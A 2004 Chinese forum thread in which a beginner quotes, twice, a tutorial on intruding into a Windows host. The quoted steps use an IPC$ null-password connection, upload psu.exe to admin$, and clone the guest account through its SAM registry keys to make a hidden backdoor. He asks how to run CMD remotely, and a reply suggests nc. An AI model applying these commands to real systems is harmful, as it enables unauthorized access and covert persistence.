9,506
社区成员
发帖
与我相关
我的任务
分享请大家帮忙,在线等!
今天我看了一篇“一次简单的3389入侵过程 ”的文章,其中有一段是:
☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆ 引文 ☆☆☆☆☆☆☆☆☆☆☆☆
回到DOS下!我们建立IPC$连接!
net use \\10.81.79.182\ipc$ "" /user:"administrator"
这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!
copy psu.exe \\10.81.79.182\admin$\system32
上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
假设guest用户被禁用,我们就是要利用guest做后门帐户!
在该服务器运行CMD,在命令行下输入
psu -p regedit -i PID
…………
做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。
☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆ 引文完毕 ☆☆☆☆☆☆☆☆☆☆☆☆
(我拿自己的两台计算机做的实验哈)我对目标计算机 10.81.79.182 建立了空连接,也把 psu.exe上载到了目标计算机上。
但现在我有一句关键的不知道怎么做,就是: “在该服务器运行CMD”,由于我是新手,我想问一下怎样在目标计算机上运行 CMD 啊????
另外一个就是怎样导出键值和删除键值啊???
☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆ 引文 ☆☆☆☆☆☆☆☆☆☆☆☆
回到DOS下!我们建立IPC$连接!
net use \\10.81.79.182\ipc$ "" /user:"administrator"
这个命令我想应该可以理解吧!命令完成后,我们把psu上传到目标机的winnt\system32目录下!
copy psu.exe \\10.81.79.182\admin$\system32
上传完毕后,开始在肉鸡做后门帐户!看肉鸡!
假设guest用户被禁用,我们就是要利用guest做后门帐户!
在该服务器运行CMD,在命令行下输入
psu -p regedit -i PID
…………
做好了以后,把HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F5
和HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\Guest
这两个键值导出,导出后把那两个键值删除!然后再导入进来!关闭注册表。
☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆☆ 引文完毕 ☆☆☆☆☆☆☆☆☆☆☆☆
(我拿自己的两台计算机做的实验哈)我对目标计算机 10.81.79.182 建立了空连接,也把 psu.exe上载到了目标计算机上。
但现在我有一句关键的不知道怎么做,就是: “在该服务器运行CMD”,由于我是新手,我想问一下怎样在目标计算机上运行 CMD 啊????
另外一个就是怎样导出键值和删除键值啊???
...全文
请发表友善的回复…
发表回复
yuwenwu_xhs 2004-11-26
- 打赏
- 举报
为什么全都沉默了,不帮助一下小弟呢??
yuwenwu_xhs 2004-11-25
- 打赏
- 举报
???
yuwenwu_xhs 2004-11-25
- 打赏
- 举报
大家能不能进来发表一下高见啊???
kakalong 2004-11-25
- 打赏
- 举报
好象有个 nc
